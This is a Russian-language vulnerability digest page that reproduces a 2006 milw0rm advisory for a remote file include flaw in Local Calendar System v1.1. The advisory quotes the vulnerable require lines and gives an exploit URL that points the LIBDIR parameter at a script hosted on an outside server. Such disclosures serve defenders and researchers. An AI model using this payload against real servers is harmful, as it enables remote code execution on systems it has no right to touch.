Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

phpPowerCards 2.10 (txt.inc. php) Remote Code Execution Vulnerability

Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

Active Bulletin Board v1.1 beta2 (doprofiledit. asp) Remote User Pass Change

From:	o0xxdark0o_(at)_msn.com <o0xxdark0o_(at)_msn.com>
Date:	23 октября 2006 г.
Subject:	local Calendar System v1.1 (lcUser.php) Remote File Include

+--------------------------------------------------------------------------------
-----------
local Calendar System v1.1 (lcUser.php) Remote File Include
---------------------------------------------------------------------------------
------------
An advanced instrumentation reservation system for equipment calendaring and user management.
---------------------------------------------------------------------------------
-----------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
---------------------------------------------------------------------------------
-----------
screenshot : http://www.loci.wisc.edu/calendar/tutorial/monthview.jpg
---------------------------------------------------------------------------------
-----------
code :
require "$LIBDIR/lcMembership.inc";
require "$LIBDIR/lcErrorChecker.inc";
---------------------------------------------------------------------------------
-----------
exploit:
local/lib/lcUser.php?LIBDIR=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
--------------------------------------------------------------------------
greetz :
:( no one
-------------------------------------------------------------------------
by o0xxdark0o
i think... so that... i m here
o0xxdark0o@msn.com
##-------------------------------------------------------------------------------
--------------------

# milw0rm.com [2006-10-18]